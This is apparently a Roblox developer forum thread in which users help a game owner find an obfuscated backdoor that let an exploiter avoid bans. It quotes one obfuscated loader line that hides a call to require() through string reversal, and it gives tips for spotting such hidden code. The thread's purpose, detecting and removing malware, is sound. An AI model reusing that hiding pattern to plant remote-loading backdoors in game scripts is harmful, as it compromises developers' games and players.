Exploiter started joining my game and everytime he runs script that makes me unable to ban him

Well I looked through scripts containing this word
image
and I found nothing wrong

the backdoor is most likely obfuscated then

Are you getting any messages in the output that go like:

Requiring asset id 1234567890
Stack Begin
(stack)
Stack End

If so, a virus is requiring a script which is the virus. If you find that, just remove it.

What do you mean obfuscated? Can you explain please?

Let me check real quick. Thank you so much.

Obfuscated are scripts that are converted so that you cant read it or copy their scripts

1 Like

Also if you find any scripts where you can scroll to the right by a lot, there’s most likely a virus there too, because it hides a line which requires an id to the right. This must have been done by a plugin, if that’s the case.

the require could be obfuscated


This might be the problem causing thing?

probably let me check the asset id

getfenv()[string.reverse("eriuqer")](1234567890/2)

getfenv() cannot be hidden, but require() can be.

Can you show the call stack? It might point to where the virus is. It might not be a virus tho.

Nope thats from adonis admin I checked https://create.roblox.com/marketplace/asset/8096250407/

This isn’t the official model, so it must be a virus.

its the loader i believe because if you click on the creator it shows the owner of the real model

Also, I seriously hate create.roblox.com when it comes to viewing assets. I viewed this instead: [Adonis] Alerts Module - Roblox
There’s so much functionality missing from create.roblox.com, like the comments, dislikes, favorite, etc. It’s so annoying.

2 Likes

image
Might this be the main problem?

It might not be the same virus, but yes that’s a virus. Press Ctrl + Shift + F while not viewing a script, and search for ‘RoSync Loader ]]’

Yessir that is the backdoor for sure

image
Thank you guys so much. I found it in one of weapons my stupid friend made.